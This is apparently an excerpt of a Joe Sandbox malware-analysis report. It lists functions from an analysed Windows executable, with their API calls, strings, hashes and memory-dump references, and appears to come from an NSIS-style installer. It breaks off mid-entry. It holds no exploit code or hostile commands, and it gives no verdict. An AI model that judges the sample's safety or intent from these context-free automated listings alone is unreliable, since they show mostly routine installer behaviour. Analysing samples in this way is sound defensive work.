                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                      • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                      • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                      • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                      Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                      • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                        • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                      • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                      • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                      • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                      • API String ID: 20674999-2124804629
                                                                                                      • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                      • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                      • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                      • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                      Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                      • GetSysColor.USER32(?), ref: 004041DB
                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                        • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                        • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                      • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                      • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                      • SetCursor.USER32(00000000), ref: 00404322
                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                      • String ID: F$N$open
                                                                                                      • API String ID: 3928313111-1104729357
                                                                                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                      Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                      • wsprintfA.USER32 ref: 00406B79
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                      • API String ID: 565278875-3368763019
                                                                                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                      • String ID: F
                                                                                                      • API String ID: 941294808-1304234792
                                                                                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                      Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      Strings
                                                                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                      • API String ID: 1641139501-220328614
                                                                                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                      Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                      • API String ID: 3734993849-3206598305
                                                                                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                      Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                      Strings
                                                                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                      • String ID: created uninstaller: %d, "%s"
                                                                                                      • API String ID: 3294113728-3145124454
                                                                                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                      Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427979,759223A0,00000000), ref: 00404FD6
                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FE6
                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427979,759223A0,00000000), ref: 00404FF9
                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                      Strings
                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                      • `G, xrefs: 0040246E
                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2031220901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2031206862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031236638.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031251326.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2031419014.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                      • API String ID: 1033533793-4193110038
                                                                                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                      Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                      • GetSysColor.USER32(?), ref: 00403E57
                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                      • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                      Memory Dump Source
